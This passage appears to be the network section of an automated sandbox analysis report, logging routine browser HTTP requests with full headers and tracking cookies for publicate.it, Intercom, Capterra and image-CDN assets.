do-pub-lb="ChAxMC4xMzEuMjM0LjgwOjgwEPu0kQk="; wooTracker=sB4hScRiWkjO; _gid=GA1.2.1661628616.1725034579; _gat=1; _lfa=LF1.1.ed1e344978a651c7.1725034579698; _ga_JL3QGDSQZ4=GS1.1.1725034582.1.0.1725034582.60.0.0; _ga=GA1.1.1381680606.1725034579; _ga_8ML5ENYGMT=GS1.1.1725034582.1.0.1725034582.60.0.0; _clck=137ejx4%7C2%7Cfor%7C0%7C1703; _clsk=1s3cw30%7C1725034585943%7C1%7C1%7Ct.clarity.ms%2Fcollect
        Source: global trafficHTTP traffic detected: GET /images/template3-p-500.png HTTP/1.1Host: publicate.itConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: */*Sec-Fetch-Site: noneSec-Fetch-Mode: corsSec-Fetch-Dest: emptyAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9Cookie: PHPSESSID=t4fh28r430k6j1mlftlc6k3evl; do-pub-lb="ChAxMC4xMzEuMjM0LjgwOjgwEPu0kQk="; wooTracker=sB4hScRiWkjO; _gid=GA1.2.1661628616.1725034579; _gat=1; _lfa=LF1.1.ed1e344978a651c7.1725034579698; _ga_JL3QGDSQZ4=GS1.1.1725034582.1.0.1725034582.60.0.0; _ga=GA1.1.1381680606.1725034579; _ga_8ML5ENYGMT=GS1.1.1725034582.1.0.1725034582.60.0.0; _clck=137ejx4%7C2%7Cfor%7C0%7C1703; _clsk=1s3cw30%7C1725034585943%7C1%7C1%7Ct.clarity.ms%2Fcollect
        Source: global trafficHTTP traffic detected: GET /images/template4-p-500.png HTTP/1.1Host: publicate.itConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: */*Sec-Fetch-Site: noneSec-Fetch-Mode: corsSec-Fetch-Dest: emptyAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9Cookie: PHPSESSID=t4fh28r430k6j1mlftlc6k3evl; do-pub-lb="ChAxMC4xMzEuMjM0LjgwOjgwEPu0kQk="; wooTracker=sB4hScRiWkjO; _gid=GA1.2.1661628616.1725034579; _gat=1; _lfa=LF1.1.ed1e344978a651c7.1725034579698; _ga_JL3QGDSQZ4=GS1.1.1725034582.1.0.1725034582.60.0.0; _ga=GA1.1.1381680606.1725034579; _ga_8ML5ENYGMT=GS1.1.1725034582.1.0.1725034582.60.0.0; _clck=137ejx4%7C2%7Cfor%7C0%7C1703; _clsk=1s3cw30%7C1725034585943%7C1%7C1%7Ct.clarity.ms%2Fcollect
        Source: global trafficHTTP traffic detected: GET /widget/cirlxq0d HTTP/1.1Host: widget.intercom.ioConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: */*Sec-Fetch-Site: cross-siteSec-Fetch-Mode: no-corsSec-Fetch-Dest: scriptReferer: https://publicate.it/Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
        Source: global trafficHTTP traffic detected: GET /images/template5-p-500.png HTTP/1.1Host: publicate.itConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: */*Sec-Fetch-Site: noneSec-Fetch-Mode: corsSec-Fetch-Dest: emptyAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9Cookie: PHPSESSID=t4fh28r430k6j1mlftlc6k3evl; do-pub-lb="ChAxMC4xMzEuMjM0LjgwOjgwEPu0kQk="; wooTracker=sB4hScRiWkjO; _gid=GA1.2.1661628616.1725034579; _gat=1; _lfa=LF1.1.ed1e344978a651c7.1725034579698; _ga_JL3QGDSQZ4=GS1.1.1725034582.1.0.1725034582.60.0.0; _ga=GA1.1.1381680606.1725034579; _ga_8ML5ENYGMT=GS1.1.1725034582.1.0.1725034582.60.0.0; _clck=137ejx4%7C2%7Cfor%7C0%7C1703; _clsk=1s3cw30%7C1725034585943%7C1%7C1%7Ct.clarity.ms%2Fcollect
        Source: global trafficHTTP traffic detected: GET /images/favicon.png HTTP/1.1Host: publicate.itConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: */*Sec-Fetch-Site: noneSec-Fetch-Mode: corsSec-Fetch-Dest: emptyAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9Cookie: PHPSESSID=t4fh28r430k6j1mlftlc6k3evl; do-pub-lb="ChAxMC4xMzEuMjM0LjgwOjgwEPu0kQk="; wooTracker=sB4hScRiWkjO; _gid=GA1.2.1661628616.1725034579; _gat=1; _lfa=LF1.1.ed1e344978a651c7.1725034579698; _ga_JL3QGDSQZ4=GS1.1.1725034582.1.0.1725034582.60.0.0; _ga=GA1.1.1381680606.1725034579; _ga_8ML5ENYGMT=GS1.1.1725034582.1.0.1725034582.60.0.0; _clck=137ejx4%7C2%7Cfor%7C0%7C1703; _clsk=1s3cw30%7C1725034585943%7C1%7C1%7Ct.clarity.ms%2Fcollect
        Source: global trafficHTTP traffic detected: GET /frame.198be77c.js HTTP/1.1Host: js.intercomcdn.comConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: */*Sec-Fetch-Site: cross-siteSec-Fetch-Mode: no-corsSec-Fetch-Dest: scriptAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
        Source: global trafficHTTP traffic detected: GET /vendor.e6414237.js HTTP/1.1Host: js.intercomcdn.comConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: */*Sec-Fetch-Site: cross-siteSec-Fetch-Mode: no-corsSec-Fetch-Dest: scriptAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
        Source: global trafficHTTP traffic detected: GET /widget/cirlxq0d HTTP/1.1Host: widget.intercom.ioConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: */*Sec-Fetch-Site: noneSec-Fetch-Mode: corsSec-Fetch-Dest: emptyAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
        Source: global trafficHTTP traffic detected: GET /events/1/a3d3f0e0e6?a=7895846&sa=1&v=1215.1253ab8&t=Unnamed%20Transaction&rst=55786&ck=1&ref=https://indd.adobe.com/view/30080812-36e9-4257-a76c-64b9db55c4c1 HTTP/1.1Host: bam-cell.nr-data.netConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: */*Sec-Fetch-Site: noneSec-Fetch-Mode: corsSec-Fetch-Dest: emptyAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9Cookie: JSESSIONID=4a13c21de71e3a5f
        Source: global trafficHTTP traffic detected: GET /vendor.e6414237.js HTTP/1.1Host: js.intercomcdn.comConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: */*Sec-Fetch-Site: noneSec-Fetch-Mode: corsSec-Fetch-Dest: emptyAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
        Source: global trafficHTTP traffic detected: GET /frame.198be77c.js HTTP/1.1Host: js.intercomcdn.comConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: */*Sec-Fetch-Site: noneSec-Fetch-Mode: corsSec-Fetch-Dest: emptyAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
        Source: global trafficHTTP traffic detected: GET /pubsub/5-2VrTcJ-wReFxxSsvN27p3l1l-rfQjhxEa0K_rcpidI_YYfbgqGBaXudDoBZfnBOD-yT-ZZ7mQ1OR91C6MrHx-21kDMXCDQnf8S3-?X-Nexus-New-Client=true&X-Nexus-Version=0.14.0&user_role=visitor HTTP/1.1Host: nexus-websocket-a.intercom.ioConnection: UpgradePragma: no-cacheCache-Control: no-cacheUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Upgrade: websocketOrigin: https://publicate.itSec-WebSocket-Version: 13Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9Sec-WebSocket-Key: Q0aP9KozPyLlmSCTR7OBOw==Sec-WebSocket-Extensions: permessage-deflate; client_max_window_bits
        Source: global trafficHTTP traffic detected: GET /messenger/web/ping HTTP/1.1Host: api-iam.intercom.ioConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: */*Sec-Fetch-Site: noneSec-Fetch-Mode: corsSec-Fetch-Dest: emptyAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
        Source: global trafficHTTP traffic detected: GET /messenger/web/ping HTTP/1.1Host: api-iam.intercom.ioConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: */*Sec-Fetch-Site: noneSec-Fetch-Mode: corsSec-Fetch-Dest: emptyAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
        Source: global trafficHTTP traffic detected: GET / HTTP/1.1Host: seoab.ioConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: */*Sec-Fetch-Site: cross-siteSec-Fetch-Mode: no-corsSec-Fetch-Dest: scriptReferer: https://www.capterra.com/Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
        Source: global trafficHTTP traffic detected: GET /las-form-min.js HTTP/1.1Host: lead-acquisition-service.softwareadvice.comConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: */*Sec-Fetch-Site: cross-siteSec-Fetch-Mode: no-corsSec-Fetch-Dest: scriptReferer: https://www.capterra.com/Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
        Source: global trafficHTTP traffic detected: GET /video/588275950-244fb2cb9bf09fea29744f33a17f6ccc6b086555648aa37316f32f0d6be2da70-d_640 HTTP/1.1Host: i.vimeocdn.comConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: image/avif,image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8Sec-Fetch-Site: cross-siteSec-Fetch-Mode: no-corsSec-Fetch-Dest: imageReferer: https://www.capterra.com/Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
        Source: global trafficHTTP traffic detected: GET /las-form-min.js HTTP/1.1Host: lead-acquisition-service.softwareadvice.comConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: */*Sec-Fetch-Site: noneSec-Fetch-Mode: corsSec-Fetch-Dest: emptyAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
        Source: global trafficHTTP traffic detected: GET / HTTP/1.1Host: seoab.ioConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: */*Sec-Fetch-Site: noneSec-Fetch-Mode: corsSec-Fetch-Dest: emptyAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
        Source: global trafficHTTP traffic detected: GET /video/588275950-244fb2cb9bf09fea29744f33a17f6ccc6b086555648aa37316f32f0d6be2da70-d_640 HTTP/1.1Host: i.vimeocdn.comConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: */*Sec-Fetch-Site: noneSec-Fetch-Mode: corsSec-Fetch-Dest: emptyAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
        Source: global trafficHTTP traffic detected: GET /ProductLogo/dd1b7965-612d-4c53-899b-0cf4a9337971.png?auto=format%2Ccompress&fit=max&w=32&q=75&ch=Width%2CDPR HTTP/1.1Host: gdm-catalog-fmapi-prod.imgix.netConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: image/avif,image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8Sec-Fetch-Site: cross-siteSec-Fetch-Mode: no-corsSec-Fetch-Dest: imageReferer: https://www.capterra.com/Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
        Source: global trafficHTTP traffic detected: GET /ProductLogo/415abb34-71b7-4fa2-8dc4-1211cac6e655.png?auto=format%2Ccompress&fit=max&w=32&q=75&ch=Width%2CDPR HTTP/1.1Host: gdm-catalog-fmapi-prod.imgix.netConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: image/avif,image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8Sec-Fetch-Site: cross-siteSec-Fetch-Mode: no-corsSec-Fetch-Dest: imageReferer: https://www.capterra.com/Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
        Source: global trafficHTTP traffic detected: GET /ProductScreenshot/d6478d12-ac95-43f1-a53a-aa8be1781a2f.png?auto=format%2Ccompress&fit=max&w=128&q=75&ch=Width%2CDPR HTTP/1.1Host: gdm-catalog-fmapi-prod.imgix.netConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: image/avif,image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8Sec-Fetch-Site: cross-siteSec-Fetch-Mode: no-corsSec-Fetch-Dest: imageReferer: https://www.capterra.com/Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
        Source: global trafficHTTP traffic detected: GET /ProductLogo/a67f601c-1c43-4480-8665-f74fae6e4252.png?auto=format%2Ccompress&fit=max&w=32&q=75&ch=Width%2CDPR HTTP/1.1Host: gdm-catalog-fmapi-prod.imgix.netConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: image/avif,image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8Sec-Fetch-Site: cross-siteSec-Fetch-Mode: no-corsSec-Fetch-Dest: imageReferer: https://www.capterra.com/Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
        Source: global trafficHTTP traffic detected: GET /ProductLogo/229dd3ed-048e-42a1-96c3-68cd64c6a705.png?auto=format%2Ccompress&fit=max&w=32&q=75&ch=Width%2CDPR HTTP/1.1Host: gdm-catalog-fmapi-prod.imgix.netConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: image/avif,image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8Sec-Fetch-Site: cross-siteSec-Fetch-Mode: no-corsSec-Fetch-Dest: imageReferer: https://www.capterra.com/Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
        Source: global trafficHTTP traffic detected: GET /ProductScreenshot/13f1c805-bb5f-4777-ae73-15df50ea1d02.png?auto=format%2Ccompress&fit=max&w=128&q=75&ch=Width%2CDPR HTTP/1.1Host: gdm-catalog-fmapi-prod.imgix.netConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: image/avif,image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8Sec-Fetch-Site: cross-siteSec-Fetch-Mode: no-corsSec-Fetch-Dest: imageReferer: https://www.capterra.com/Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
        Source: global trafficHTTP traffic detected: GET /ProductLogo/b2520648-b79c-4e03-98c1-8ad16b374420.png?auto=format%2Ccompress&fit=max&w=96&q=75&ch=Width%2CDPR HTTP/1.1Host: gdm-catalog-fmapi-prod.imgix.netConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: image/avif,image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8Sec-Fetch-Site: cross-siteSec-Fetch-Mode: no-corsSec-Fetch-Dest: imageReferer: https://www.capterra.com/Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
        Source: global trafficHTTP traffic detected: GET /ProductLogo/e4a33fab-dc7a-4869-b53e-a3876430e9cb.png?auto=format%2Ccompress&fit=max&w=32&q=75&ch=Width%2CDPR HTTP/1.1Host: gdm-catalog-fmapi-prod.imgix.netConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: image/avif,image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8Sec-Fetch-Site: cross-siteSec-Fetch-Mode: no-corsSec-Fetch-Dest: imageReferer: https://www.capterra.com/Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
        Source: global trafficHTTP traffic detected: GET /ProductLogo/91f64896-759a-41ae-8d14-d540f90c5870.png?auto=format%2Ccompress&fit=max&w=32&q=75&ch=Width%2CDPR HTTP/1.1Host: gdm-catalog-fmapi-prod.imgix.netConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: image/avif,image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8Sec-Fetch-Site: cross-siteSec-Fetch-Mode: no-corsSec-Fetch-Dest: imageReferer: https://www.capterra.com/Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
        Source: global trafficHTTP traffic detected: GET /ProductLogo/dd1b7965-612d-4c53-899b-0cf4a9337971.png?auto=format%2Ccompress&fit=max&w=32&q=75&ch=Width%2CDPR HTTP/1.1Host: gdm-catalog-fmapi-prod.imgix.netConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: */*Sec-Fetch-Site: noneSec-Fetch-Mode: corsSec-Fetch-Dest: emptyAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
        Source: global trafficHTTP traffic detected: GET /ProductLogo/415abb34-71b7-4fa2-8dc4-1211cac6e655.png?auto=format%2Ccompress&fit=max&w=32&q=75&ch=Width%2CDPR HTTP/1.1Host: gdm-catalog-fmapi-prod.imgix.netConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: */*Sec-Fetch-Site: noneSec-Fetch-Mode: corsSec-Fetch-Dest: emptyAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
        Source: global trafficHTTP traffic detected: GET /ProductLogo/af2cdc9a-967d-4921-a711-ec9e1a75cf88.png?auto=format%2Ccompress&fit=max&w=32&q=75&ch=Width%2CDPR HTTP/1.1Host: gdm-catalog-fmapi-prod.imgix.netConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: image/avif,image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8Sec-Fetch-Site: cross-siteSec-Fetch-Mode: no-corsSec-Fetch-Dest: imageReferer: https://www.capterra.com/Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
        Source: global trafficHTTP traffic detected: GET /ProductLogo/a67f601c-1c43-4480-8665-f74fae6e4252.png?auto=format%2Ccompress&fit=max&w=32&q=75&ch=Width%2CDPR HTTP/1.1Host: gdm-catalog-fmapi-prod.imgix.netConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: */*Sec-Fetch-Site: noneSec-Fetch-Mode: corsSec-Fetch-Dest: emptyAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
        Source: global trafficHTTP traffic detected: GET /ProductLogo/5152f7c6-61ed-4168-b89f-f436d97ebccd.png?auto=format%2Ccompress&fit=max&w=128&q=75&ch=Width%2CDPR HTTP/1.1Host: gdm-catalog-fmapi-prod.imgix.netConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: image/avif,image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8Sec-Fetch-Site: cross-siteSec-Fetch-Mode: no-corsSec-Fetch-Dest: imageReferer: https://www.capterra.com/Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
        Source: global trafficHTTP traffic detected: GET /ProductLogo/229dd3ed-048e-42a1-96c3-68cd64c6a705.png?auto=format%2Ccompress&fit=max&w=32&q=75&ch=Width%2CDPR HTTP/1.1Host: gdm-catalog-fmapi-prod.imgix.netConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: */*Sec-Fetch-Site: noneSec-Fetch-Mode: corsSec-Fetch-Dest: emptyAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
        Source: global trafficHTTP traffic detected: GET /ProductScreenshot/13f1c805-bb5f-4777-ae73-15df50ea1d02.png?auto=format%2Ccompress&fit=max&w=128&q=75&ch=Width%2CDPR HTTP/1.1Host: gdm-catalog-fmapi-prod.imgix.netConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: */*Sec-Fetch-Site: noneSec-Fetch-Mode: corsSec-Fetch-Dest: emptyAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
        Source: global trafficHTTP traffic detected: GET /ProductLogo/d5bb525e-43fd-44ad-b018-e69dbd4d4817.jpeg?auto=format%2Ccompress&fit=max&w=128&q=75&ch=Width%2CDPR HTTP/1.1Host: gdm-catalog-fmapi-prod.imgix.netConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: image/avif,image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8Sec-Fetch-Site: cross-siteSec-Fetch-Mode: no-corsSec-Fetch-Dest: imageReferer: https://www.capterra.com/Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
        Source: global trafficHTTP traffic detected: GET /ProductScreenshot/d6478d12-ac95-43f1-a53a-aa8be1781a2f.png?auto=format%2Ccompress&fit=max&w=128&q=75&ch=Width%2CDPR HTTP/1.1Host: gdm-catalog-fmapi-prod.imgix.netConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: */*Sec-Fetch-Site: noneSec-Fetch-Mode: corsSec-Fetch-Dest: emptyAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
        Source: global trafficHTTP traffic detected: GET /ProductLogo/0d820dd6-6e0b-43de-becb-e9078a2d9fac.png?auto=format%2Ccompress&fit=max&w=128&q=75&ch=Width%2CDPR HTTP/1.1Host: gdm-catalog-fmapi-prod.imgix.netConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: image/avif,image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8Sec-Fetch-Site: cross-siteSec-Fetch-Mode: no-corsSec-Fetch-Dest: imageReferer: https://www.capterra.com/Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
        Source: global trafficHTTP traffic detected: GET /ProductLogo/1a2b2816-ff47-405e-a9e2-2b8d6fd68dfd.png?auto=format%2Ccompress&fit=max&w=128&q=75&ch=Width%2CDPR HTTP/1.1Host: gdm-catalog-fmapi-prod.imgix.netConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: image/avif,image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8Sec-Fetch-Site: cross-siteSec-Fetch-Mode: no-corsSec-Fetch-Dest: imageReferer: https://www.capterra.com/Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
